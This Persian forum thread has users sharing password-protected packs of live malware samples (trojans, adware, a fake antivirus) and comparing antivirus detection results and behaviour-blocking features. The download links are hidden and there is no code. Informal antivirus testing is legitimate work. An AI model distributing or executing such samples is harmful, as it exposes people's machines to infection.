این Adware رو تا بحال 4 آنتی ویروس طبق نتیجه اسکن زیر شناسایی کردند و هیچ کدام از آنتی ویروسهای معروف جزو این لیست نیستند. :13:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دومین نمونه یک آنتی ویروس قلابی است. شاید بعضی ها در جمع ما باشند که سیستمشون به این آنتی ویروسهای قلابی آلوده شده باشه. این آنتی ویروس ها و آنتی اسپای ور های قلابی فایل ستاپ دارند و اینستال میشند و سایت های این آنتی ویروسها آنچنان قشنگ طراحی میشه که قربانی فکر میکنه با یک آنتی ویروس خیلی خفن روبرو شده و زود دانلود و نصبش میکنه.

آنتی ویروسهای قلابی بعد از آلوده کردن سیستم و درخواست پول برای پاک کردن 4000000 آلودگی که در سیستم پیدا کردند درخواست Cash یعنی پول میکنند و تنها راه پرداختشم از طریق کارتهای اعتباری است. اما کارشون اینجا ختم نمیشه و بعضی از اونها تروجانهای دیگه ای رو هم در صورت اتصال به اینترنت دانلود میکنند و سیستم طرف رو از بیخ با هم داغون میکنند.

نتیجه اسکن این آنتی ویروس قلابی این شد که بعضی آنتی ویروسها مانند کسپرسکی و یا نورتون هنوز اون رو بطور رسمی در دیتابیس خودشون ثبت نکردند.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سومین نمونه هم یک تروجانیه که با دلفی نوشته شده و فعلا 7 آنتی ویروس اون رو شناسایی کردند.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود نمونه ها...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: 123



اويرا امروز 3 تاشو شناخت.

نوشته شده توسط Ava UK
چند نمونه جدید ...

خب اینم برای مشغولیت امروز

سلام

جی دیتا از اون سه تا فقط آنتی ویروس قلابیه رو شناخت ، آویرا رایگان هم همین رو .


اینم یه ................ مخربه دیگه

جی دیتا این یکی رو هم شناخت ، آویرا رایگان اینو نشناخت .




عشق ، هم آ مدنی است و هم آموختنی .

اويرا امروز 3 تاشو شناخت.

wordship شما مطمئنی Avira هر 3 رو شناسایی کرد؟

Avira فقط فایل Antivirus 2011 رو به اسم DR/FraudTool.AntiSpywareBot.EA تونست شناسایی بکنه. در 2 تای دیگه فعلا سکوت اختیار کرده.:31: جریان چیه بگو ببینم. :21:

یک بسته شامل 30 نوع مختلف مخرب جهت تست و بررسی آنتی ویروسها.


فایل های آلوده ای که در این بسته قرار دارند زیاد جدید نیستند و اکثرا مربوط به 1 ماه تا 2 ماه پیش میشند. آنتی ویروسها براحتی باید همه 30 تا فایل را شناسایی کنند. :5: ببینیم برنده میدان کی خواهد بود. من خودم وقت نکردم دونه به دونه شون رو اسکن کنم تا ببینم کدوم آنتی ویروس همه شون رو شناسایی میکنه.

دانلود بسته 30 تایی از مخرب ها
محتوای این بسته قبلا توسط من و یا دوستان دیگه ارسال نشده و همشون جدید هستند اما با قدمتی 1 تا 2 ماه.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: 123

یک بسته شامل 30 نوع مختلف مخرب جهت تست و بررسی آنتی ویروسها.


فایل های آلوده ای که در این بسته قرار دارند زیاد جدید نیستند و اکثرا مربوط به 1 ماه تا 2 ماه پیش میشند. آنتی ویروسها براحتی باید همه 30 تا فایل را شناسایی کنند. :5: ببینیم برنده میدان کی خواهد بود. من خودم وقت نکردم دونه به دونه شون رو اسکن کنم تا ببینم کدوم آنتی ویروس همه شون رو شناسایی میکنه.

دانلود بسته 30 تایی از مخرب ها
محتوای این بسته قبلا توسط من و یا دوستان دیگه ارسال نشده و همشون جدید هستند اما با قدمتی 1 تا 2 ماه.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123
اقا کسپر 28 تا شناخت

یک بسته شامل 30 نوع مختلف مخرب جهت تست و بررسی آنتی ویروسها.


فایل های آلوده ای که در این بسته قرار دارند زیاد جدید نیستند و اکثرا مربوط به 1 ماه تا 2 ماه پیش میشند. آنتی ویروسها براحتی باید همه 30 تا فایل را شناسایی کنند. :5: ببینیم برنده میدان کی خواهد بود. من خودم وقت نکردم دونه به دونه شون رو اسکن کنم تا ببینم کدوم آنتی ویروس همه شون رو شناسایی میکنه.

دانلود بسته 30 تایی از مخرب ها
محتوای این بسته قبلا توسط من و یا دوستان دیگه ارسال نشده و همشون جدید هستند اما با قدمتی 1 تا 2 ماه.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123
چرا نورتون 19 تا شناخت!!! ؟

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

کسپر 29 تا شناخت!!

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

یک بسته شامل 30 نوع مختلف مخرب جهت تست و بررسی آنتی ویروسها.


فایل های آلوده ای که در این بسته قرار دارند زیاد جدید نیستند و اکثرا مربوط به 1 ماه تا 2 ماه پیش میشند. آنتی ویروسها براحتی باید همه 30 تا فایل را شناسایی کنند. :5: ببینیم برنده میدان کی خواهد بود. من خودم وقت نکردم دونه به دونه شون رو اسکن کنم تا ببینم کدوم آنتی ویروس همه شون رو شناسایی میکنه.

دانلود بسته 30 تایی از مخرب ها
محتوای این بسته قبلا توسط من و یا دوستان دیگه ارسال نشده و همشون جدید هستند اما با قدمتی 1 تا 2 ماه.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123

نتیجه ی اسکن با Avira Antivir Personal Free با آخرین آپدیت تا این لحظه.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چرا نورتون 19 تا شناخت!!! ؟

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نورتن توی دیتابیس قوی نیست, تنها قدرت نورتون توی Behavior Blocker ش هست که در نورتون به اسم Sonar شناخته میشه و تا زمانی که نمونه ها اجرا نشند نمیشه در موردش قضاوت کرد. در کسپرسکی هم به همین صورت. البته تفاوت کسپرسکی در اینه که دیتابیس قویتری نسبت به نورتون داره و همزمان Behavior Blocker را هم داره و تا زمانی که نمونه های ناشناخته برای کسپرسکی اجرا نشند نمیشه گفت کسپرسکی نتونسته اون رو بشناسه.

برای کسانی هم که به یک Behavior Blocker در کنار آنتی ویروسی که این تکنولوژی را نداره احتیاج دارند بهتره از ThreatFire استفاده کنند.

wordship شما مطمئنی Avira هر 3 رو شناسایی کرد؟

Avira فقط فایل Antivirus 2011 رو به اسم DR/FraudTool.AntiSpywareBot.EA تونست شناسایی بکنه. در 2 تای دیگه فعلا سکوت اختیار کرده.:31: جریان چیه بگو ببینم. :21:

جریان اینه که یکی از دوستان طرفدار اویرا برای انالیز به اویر فرستاد
حالا 4 تاش رو میشناسه.:41:

جریان اینه که یکی از دوستان طرفدار اویرا برای انالیز به اویر فرستاد
حالا 4 تاش رو میشناسه.:41:

من همین الان دوباره 2 نمونه شناخته نشده را با Avira اسکن کردم و نتیجه فرقی نکرد. برای اینکه مطمئن بشم نتیجه ای که من گرفتم درسته یا نه اون در آنلاین هم اسکن کردم اما نتیجه همون بود و اویرا نشناخت.

نتیجه ی اسکن با Avira همراه آخرین آپدیت با شماره 7.10.08.155

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نتیجه ی اسکن آنلاین مربوط به 5 دقیقه پیش.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدهمانطور که میبینی فعلا چیزی به دیتابیس اویرا اضافه نشده و تا زمانی هم که در دیتابیس ثبت نشه نمیشه گفت اویرا اون رو میشناسه. اگر نتیجه ای که شما گرفتید فرق میکنه میشه یک عکس از پیغامی که اویرا بهتون در زمان شناسایی نشون میده بزارید؟ :46: مرسی :10:

این هم از malwarebytes anti malware

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

من همین الان دوباره 2 نمونه شناخته نشده را با Avira اسکن کردم و نتیجه فرقی نکرد. برای اینکه مطمئن بشم نتیجه ای که من گرفتم درسته یا نه اون در آنلاین هم اسکن کردم اما نتیجه همون بود و اویرا نشناخت.

نتیجه ی اسکن با Avira همراه آخرین آپدیت با شماره 7.10.08.155

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نتیجه ی اسکن آنلاین مربوط به 5 دقیقه پیش.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدهمانطور که میبینی فعلا چیزی به دیتابیس اویرا اضافه نشده و تا زمانی هم که در دیتابیس ثبت نشه نمیشه گفت اویرا اون رو میشناسه. اگر نتیجه ای که شما گرفتید فرق میکنه میشه یک عکس از پیغامی که اویرا بهتون در زمان شناسایی نشون میده بزارید؟ :46: مرسی :10:

4 تا ویروس دیگه هم اپلود کرده بودی اونا رو میشناسه
یکیش 2 مگ بود
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

یک بسته شامل 30 نوع مختلف مخرب جهت تست و بررسی آنتی ویروسها.


فایل های آلوده ای که در این بسته قرار دارند زیاد جدید نیستند و اکثرا مربوط به 1 ماه تا 2 ماه پیش میشند. آنتی ویروسها براحتی باید همه 30 تا فایل را شناسایی کنند. :5: ببینیم برنده میدان کی خواهد بود. من خودم وقت نکردم دونه به دونه شون رو اسکن کنم تا ببینم کدوم آنتی ویروس همه شون رو شناسایی میکنه.

دانلود بسته 30 تایی از مخرب ها
محتوای این بسته قبلا توسط من و یا دوستان دیگه ارسال نشده و همشون جدید هستند اما با قدمتی 1 تا 2 ماه.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123
نورتون این 11 تارو از روی اسکن تشخیص نمیده
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
با اینکه دیپ فریز کردم ولی بازهم ترسیدم اجرا کنم تا ببینم نورتون از روی سونار میشناسه یا نه
ولی خدایی نورتون اگه سونارو نداشت چی میشد
چون اصلا دیتابیس نداره لامصب این همه ویروسه این تاپیک رو دانلود کردم فقط باید اجرا بشن تا بشناسه:44:

4 تا ویروس دیگه هم اپلود کرده بودی اونا رو میشناسه
یکیش 2 مگ بود
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دوست عزیز این عکسی که شما گذاشتی هیچ ربطی به 3 نمونه گذاشته شده ی قبلی من نداره و الان 2 صفحه است که داریم در موردش بحث میکنیم و میگم که هنوز اویرا نمیشناسه.

دوست عزیز 2 نمونه ای که داریم در موردش بحث میکنیم یکیش اسمش Adware_P5b8c4b.exe است و اون یکی هم اسمش BonusCash_Delphi.exe است. من الان هر دو نمونه را برای اویرا ارسال کردم و با کامل تعجب دیدم که هیچ کدام از نمونه ها برای اویرا ارسال نشده :18:

چون اگر ارسال میشد همون لحظه در پیغام میگه که این نمونه قبلا برای ما فرستاده شده و در دیتابیس ما با فلان اسم شناخته میشه. اما نتیجه این شد که ...

اسم فایل رو دقت کن :3:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

حالا این پست رو یک نگاه بنداز ببین کدوم پست من رو نقل قول کردی و گفتی که اویرا هر 3 تاشو میشناسه.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
دوست عزیز اویرا هنوز 2 مورد از 3 مورد پست بالا رو شناسایی نمیکنه و کسی هم تا بحال این نمونه ا رو برای اویرا ارسال نکرده بود. اگر غیر از اینه خوشحال میشم نامه ای رو که از اویرا دریافت کردی و در مورد اون 2 نمونه است نه نمونه های دیگه در عکسی نشون بدی, شاید من اشتباه میکنم. :46: هر چند که فکر کنم توضیحات کافی باشه و متوجه شده باشید. :10:

با اینکه دیپ فریز کردم ولی بازهم ترسیدم اجرا کنم تا ببینم نورتون از روی سونار میشناسه یا نه
ولی خدایی نورتون اگه سونارو نداشت چی میشد
چون اصلا دیتابیس نداره لامصب این همه ویروسه این تاپیک رو دانلود کردم فقط باید اجرا بشن تا بشناسه:44:

خب نشناسه
تا اجرا نشه که هیچ اتفاقی نمی افته. ولی این رو هم یادمون باشه که تو اینهمه ویروس و تروجان تا حالا هیچ آنتی ویروسی به پای شناسایی نورتون نرسیده . :40:

ولی خودمونیم خیلی تاپیک خوبی شده . ممنون از همه اساتید که زحمت میکشن . اسم نمیارم که کم لطفی به سایر دوستان نشه

دوست عزیز این عکسی که شما گذاشتی هیچ ربطی به 3 نمونه گذاشته شده ی قبلی من نداره و الان 2 صفحه است که داریم در موردش بحث میکنیم و میگم که هنوز اویرا نمیشناسه.

دوست عزیز 2 نمونه ای که داریم در موردش بحث میکنیم یکیش اسمش Adware_P5b8c4b.exe است و اون یکی هم اسمش BonusCash_Delphi.exe است. من الان هر دو نمونه را برای اویرا ارسال کردم و با کامل تعجب دیدم که هیچ کدام از نمونه ها برای اویرا ارسال نشده :18:

چون اگر ارسال میشد همون لحظه در پیغام میگه که این نمونه قبلا برای ما فرستاده شده و در دیتابیس ما با فلان اسم شناخته میشه. اما نتیجه این شد که ...

اسم فایل رو دقت کن :3:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

حالا این پست رو یک نگاه بنداز ببین کدوم پست من رو نقل قول کردی و گفتی که اویرا هر 3 تاشو میشناسه.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
دوست عزیز اویرا هنوز 2 مورد از 3 مورد پست بالا رو شناسایی نمیکنه و کسی هم تا بحال این نمونه ا رو برای اویرا ارسال نکرده بود. اگر غیر از اینه خوشحال میشم نامه ای رو که از اویرا دریافت کردی و در مورد اون 2 نمونه است نه نمونه های دیگه در عکسی نشون بدی, شاید من اشتباه میکنم. :46: هر چند که فکر کنم توضیحات کافی باشه و متوجه شده باشید. :10:


خب اشتباه پیش میاد
این تاپیک خیلی سریع جلو میره من اشتباه کردم ببخشید.

خب اشتباه پیش میاد
این تاپیک خیلی سریع جلو میره من اشتباه کردم ببخشید.

اشکالی نداره دوست عزیز. منم فقط خواستم موضوع روشن بشه آخه تعجب کردم که گفتید اویرا میشناسه. :31:
نمونه ها زیاد شدند بعضی وقتها آدم اشتباه میکنه. :11:

برای اینکه این پست خالی نمونه یک تروجان جدید میزارم که اویرا حتما بشناسه و سو تفاهم پیش نیاد :31:
این تروجان تا بحال توسط 7 آنتی ویروس شناسایی شده که ناد32 و اویرا و کسپرسکی و نورتون جزو معروفهایی هستند که میشناسند.

این دفعه نورتون به Sonar احتیاجی نداره :21: :46:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
دانلود ...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد:123

نورتون این 11 تارو از روی اسکن تشخیص نمیده
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
با اینکه دیپ فریز کردم ولی بازهم ترسیدم اجرا کنم تا ببینم نورتون از روی سونار میشناسه یا نه
ولی خدایی نورتون اگه سونارو نداشت چی میشد
چون اصلا دیتابیس نداره لامصب این همه ویروسه این تاپیک رو دانلود کردم فقط باید اجرا بشن تا بشناسه:44:

سعی کن وسوسه نشی اجراشون بکنی. چون اگر Sonar نتونه تشخیص بده چیکار میخوای بکنی :24: البته درصد اینکه بیشترشون رو تشخیص بده هست اما باز هم یک چند تایی حتما میمونه که تشخیص نده. :46:

دوستانی که سیستم خودشونو به خطر میندازن فقط میتونم بگم دم همگیتون گرم :11:

بدون شرح :20:


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: 123

خب نشناسه
تا اجرا نشه که هیچ اتفاقی نمی افته. ولی این رو هم یادمون باشه که تو اینهمه ویروس و تروجان تا حالا هیچ آنتی ویروسی به پای شناسایی نورتون نرسیده . :40:

ولی خودمونیم خیلی تاپیک خوبی شده . ممنون از همه اساتید که زحمت میکشن . اسم نمیارم که کم لطفی به سایر دوستان نشه
بابا اختیار داری :31: یه نگاه بندازی میبینی کسپر یکه یکه :king:

بدون شرح :20:


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123
کسپر نشناخت ارسال شد

بسته ی 52 تایی / بزرگترین بسته ی ارسال شده حاوی Malware ها در پی سی ورد.


این بزرگترین بسته ای هست که تا حالا در پی سی ورد معرفی کردم. این بسته شامل 52 فایل آلوده به کرم, تروجان, ویروس, Adware و غیره است. البته من دوست داشتم اکسپلویت ها رو هم در این بسته جا بدم اما چون کار اکسپلویت ها یک چیز دیگه است و بهتره که از اونها بصورت آنلاین تست گرفته بشه اونها رو استفاده نکردم.

فایل های داخل این بسته حداقل 1 ماه قدیمی هستند و آنتی ویروسها باید همه 52 فایل را تشخیص بدند. از این 52 فایل 2 فایل را در موقع اسکن نادیده بگیرید و نتیجه را از 50 تا فایل حساب کنید. این 2 فایل رو به آنتی ویروسها آوانس میدیم اما بیشتر نه. :31:

امیدوارم که طرفداران NOD32, BitDefender, Avast, McAfee, TrendMicro هم در این تست شرکت بکنند چون در تست های قبلی خبری ازشون نبود. :5::10:
بیشترین میزان شناسایی را کدام آنتی ویروس خواهد داشت؟

محتوای این بسته قبلا توسط من یا دوستان دیگه ارسال نشده.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123

بیشترین میزان شناسایی را کدام آنتی ویروس خواهد داشت؟
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

کسپر 68 تا شناخت!!!

***********************
یه سوال در مورد نورتون
تکنولوزی Sonar چیه؟

ممنون:11:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

کسپر 68 تا شناخت!!!

***********************
یه سوال در مورد نورتون
تکنولوزی Sonar چیه؟

ممنون:11:

نه دوست عزیز کسپرسکی تونسته 68 تا فایل رو از توی 52 فایل آلوده تشخیص بده. مثلا یک فایل exe ممکنه فشرده شده باشه و داخلش چند فایل دیگه وجود داشته باشند اما بعضی از exe ها پسورد دارند و کسپرسکی یا آنتی ویروسهای دیگه نمیتونند داخلشون رو اسکن کنند و تا زمانی که اجرا نشند قابل شناسایی نیستند.

شما یک کپی از بسته ی 52 تایی را یک جا دیگه نگه دار تا داشته باشی و یکی از این بسته ها رو دوباره با کسپرسکی اسکن کن و بعد هر چی پیدا کرد پاک کن. داخل فایل آرشیو شده را نگاه کن و ببین چند تا فایل توش باقی مونده. اینجوری بهتر متوجه میشی که در واقع کسپرسکی از 52 فایل چند تا رو شناسایی کرده. :10:
یا میتونی زمانی که کسپرسکی کاملا فعال و آپدیت شده است فایل آرشیو شده رو extract کنی. هر چیزی کسپرسکی شناسایی بکنه سریع پاکش میکنه. البته اگر به تنظیمات پیش فرضش دست نزده باشید و هر چیزی هم شناسایی نکنه از داخل فایل آرشیو شده خارج میشه و داخل یک فولدر قرار میگیرند. البته فایل ها رو اجرا نکن چون تا زمانی که اجرا نکنی هیچ خطری برای سیستم ندارند. بعد یک عکس از فایل های شناسایی نشده میتونی بگیری تا ببینیم چه چیز هایی رو شناسایی نکرده.:3:

Sonar هم دقیقا یک Behavior Blocker است. Behavior Blocker الان در خیلی از آنتی ویروسها وجود داره مانند Kaspersky, Avast, CIS, Bitdefender, Avira Antivir

نکته: Behavior Blocker در آنتی ویروس Avast فعلا در نسخه ی 5.0.545 فقط در سیستم های 32 بیتی کار میکنه.

سلام Ava UK جان نورتونه من ویروس پست 301 که تو دیتابیسشه رو نشناخت:18:
ویروسه پست 304 را هم نشناخت
(البته از روی اسکن)

بسته ی 52 تایی / بزرگترین بسته ی ارسال شده حاوی Malware ها در پی سی ورد.


این بزرگترین بسته ای هست که تا حالا در پی سی ورد معرفی کردم. این بسته شامل 52 فایل آلوده به کرم, تروجان, ویروس, Adware و غیره است. البته من دوست داشتم اکسپلویت ها رو هم در این بسته جا بدم اما چون کار اکسپلویت ها یک چیز دیگه است و بهتره که از اونها بصورت آنلاین تست گرفته بشه اونها رو استفاده نکردم.

فایل های داخل این بسته حداقل 1 ماه قدیمی هستند و آنتی ویروسها باید همه 52 فایل را تشخیص بدند. از این 52 فایل 2 فایل را در موقع اسکن نادیده بگیرید و نتیجه را از 50 تا فایل حساب کنید. این 2 فایل رو به آنتی ویروسها آوانس میدیم اما بیشتر نه. :31:

امیدوارم که طرفداران NOD32, BitDefender, Avast, McAfee, TrendMicro هم در این تست شرکت بکنند چون در تست های قبلی خبری ازشون نبود. :5::10:
بیشترین میزان شناسایی را کدام آنتی ویروس خواهد داشت؟

محتوای این بسته قبلا توسط من یا دوستان دیگه ارسال نشده.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: 123
نورتون از روی اسکن 15 تا رو تشخیص نداد
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

کسپر ما هم 64 تا شناخت اما ائن توضیحاتی دکه به دریملند دادی من متوجه نشدم که باید چی کار کنم

نوشته شده توسط Ava UK [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

بسته ی 52 تایی / بزرگترین بسته ی ارسال شده حاوی Malware ها در پی سی ورد.


این بزرگترین بسته ای هست که تا حالا در پی سی ورد معرفی کردم. این بسته شامل 52 فایل آلوده به کرم, تروجان, ویروس, Adware و غیره است. البته من دوست داشتم اکسپلویت ها رو هم در این بسته جا بدم اما چون کار اکسپلویت ها یک چیز دیگه است و بهتره که از اونها بصورت آنلاین تست گرفته بشه اونها رو استفاده نکردم.

فایل های داخل این بسته حداقل 1 ماه قدیمی هستند و آنتی ویروسها باید همه 52 فایل را تشخیص بدند. از این 52 فایل 2 فایل را در موقع اسکن نادیده بگیرید و نتیجه را از 50 تا فایل حساب کنید. این 2 فایل رو به آنتی ویروسها آوانس میدیم اما بیشتر نه. [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

امیدوارم که طرفداران NOD32, BitDefender, Avast, McAfee, TrendMicro هم در این تست شرکت بکنند چون در تست های قبلی خبری ازشون نبود. [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
بیشترین میزان شناسایی را کدام آنتی ویروس خواهد داشت؟

محتوای این بسته قبلا توسط من یا دوستان دیگه ارسال نشده.
کد:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
پسورد: 123

این فایل fbalance را نه آویرا شناخت نه malwarebytes نه hitman این هم لینکش تو توتال فقط comodo و fsecure اونا میشناسن.



کد:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] 86c565959c56de-1277281660
اینا را آویرا نشناخت



این هم نتیجه malwarebytes

داخل فایل آرشیو شده را نگاه کن و ببین چند تا فایل توش باقی مونده.
کسپر 12 تا رو تشخیص نداده!

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام

جی دیتا تمام محتویات داخل پگ رو حذف کرد ، 54 مورد .


عشق ، هم آمدنی است و هم آموختنی .

دوستان من بعد از اینکه فایل ها رو اسکن کردم کسپرم قرمز شده و این پیام روش هست و هرچی اون کلمه ای رو که دورش خط کشیدم میزنم عمل نمی کنه و یک دور کامل اسکن کردم اما چیز خاصی نشناخت[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام

جی دیتا تمام محتویات داخل پگ رو حذف کرد ، 54 مورد .



مرسی امیر جان.
بله من هم برای اینکه مطمئن بشم اشتباه نکردی:46: چک کردم. بیشتر شناسایی G-Data توسط انجین Bitdefender انجام شده و همه موارد با همکاری انجین های Avast+Bitdefender شناسایی شدند.

ادیت> فایل fbalance توسط جی دیتا شناسایی نمیشه پس نباید همه فایل آرشیو شده رو پاک کنه. چک کنید و دوباره خبر بدید.
:20:


---------- Post added at 11:27 AM ---------- Previous post was at 11:26 AM ----------


دوستان من بعد از اینکه فایل ها رو اسکن کردم کسپرم قرمز شده و این پیام روش هست و هرچی اون کلمه ای رو که دورش خط کشیدم میزنم عمل نمی کنه و یک دور کامل اسکن کردم اما چیز خاصی نشناخت[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

شما ریستارت کن و دوباره پاک کن.

---------- Post added at 11:29 AM ---------- Previous post was at 11:27 AM ----------



کسپر 12 تا رو تشخیص نداده!

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Kill AV و TDSS خطرناکترینشون در بین فایل های شناسایی نشده توسط کسپر هستند.
مرسی نتیجه ی جالبی بود.

ری استارت هم کردم نشد

این فایل fbalance را نه آویرا شناخت نه malwarebytes نه hitman این هم لینکش تو توتال فقط comodo و fsecure اونا میشناسن.




برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیداینا را آویرا نشناخت

این هم نتیجه malwarebytes


احتمال این وجود داره که این فایل اصلا آلوده نباشه و F-Secure و Comodo اون رو اشتباهی شناسایی کردند.این جور تشخیص های کاذب رو هر آنتی ویروسی میتونه داشته باشه.

بهتره یکی فایل رو برای کسپرسکی بفرسته. اگر اونها فایل رو آلوده تشخیص دادند پس این تشخیص توسط دو آنتی ویروس بالا هم درست بوده. در غیر این صورت جزو False positive ها حساب میشه و شما این فایل رو جزو اون 2 فایلی که گفتم حساب نکنید بزارید. :46:

به به سلام دوستان
و اینک نود 32
ترکونده دوستان
از فایل52 ویروس هر 52 تا رو شناخت و حذف کرد
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

و از فایل 32 ویروس 28 تا رو شناخت ولی کله آرشیو رو حذف کرد

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

---------- Post added at 08:01 PM ---------- Previous post was at 08:00 PM ----------

ببخشید اشتباه شد
فایل 32 ویروس 28 تا رو شناخت ولی کله آرشیو رو حذف کرد
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

---------- Post added at 08:02 PM ---------- Previous post was at 08:01 PM ----------

نود 32 ویروسهای Antivirus 2011 و BonusCash_Delphi رو هم شناخت و حذف کرد. ولی هنوز Adware_P5b8c4b رو نمیشناسه . فایلش ارسال شد

البته 30 ویروس بود و من اشتباهی نوشتم 32 ویروس. ولی در هر حال نود 28 تا رو شناخت.

---------- Post added at 08:13 PM ---------- Previous post was at 08:10 PM ----------

نود32 ویروس oo_new_malware رو هم که نورتون نمیشناسه شناخت و حذف کرد.
ویروس lockfree.exe رو هم که کسپر از مجموعه 20 ویورس نمیشناخت، شناسایی کرد و حذف نمود.
ظاهرا که فعلا امروز نو32 ترکونده و بهتر از بقیه آنتی ویروسها ظاهر شده.

به به سلام دوستان
و اینک نود 32
ترکونده دوستان
از فایل52 ویروس هر 52 تا رو شناخت و حذف کرد
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

و از فایل 32 ویروس 28 تا رو شناخت ولی کله آرشیو رو حذف کرد

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

---------- Post added at 08:01 PM ---------- Previous post was at 08:00 PM ----------

ببخشید اشتباه شد
فایل 32 ویروس 28 تا رو شناخت ولی کله آرشیو رو حذف کرد
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

---------- Post added at 08:02 PM ---------- Previous post was at 08:01 PM ----------

نود 32 ویروسهای Antivirus 2011 و BonusCash_Delphi رو هم شناخت و حذف کرد. ولی هنوز Adware_P5b8c4b رو نمیشناسه . فایلش ارسال شد

این نتیجه ها عالین. مرسی. :10:
اما ناد32 نتونسته همه 52 فایل آلوده یا همه 28 فایل بعدی را تشخیص بده. اگر به عکس هایی که گذاشتی دقت کنی متوجه میشی که بطور نمونه فایل troj.exe_40 را 3 بار شناسایی کرده و از داخل فایل exe که یکی از فایل های فشرده شده بحساب میاد فایل dll آلوده را هم پیدا کرده.

برای اینکه شناسایی دقیق انجام بشه 52 فایل یا 30 فایل rar شده را با کلیک راست اسکن نکنید. بلکه اول همه رو از rar خارج کنید تا داخل یک فولدر قرار بگیرند و بعد روی فولدر کلیک راست کنید تا همه شون اسکن بشند. بعد متوجه میشی که داخل فولدر چند تا فایل باقی میمونه که ناد32 نتونسته تشخیص بده اما فکر نکنم تعدادشون زیاد باشه. بهر حال نتیجه رو با روشی که گفتم بزاری بهتره.:10:

ناد32 توی آنپک کردن فایل های فشرده از نسخه 2 مشکل داشته و هنوز در نسخه 4 نتونسته این مشکل رو حل بکنه. به این صورت که اگر داخل یک فایل فشرده شده 100 تا فایل سالم و 1فقط 1 فایل آلوده وجود داشته باشه همه آرشیو رو با همه 100 فایل سالم حذف میکنه. البته تا زمانی که فایل آلوده از آرشیو خارج نشه و اجرا نشه خطری نداره. این جوابیه که ناد32 به کاربرانش میده.

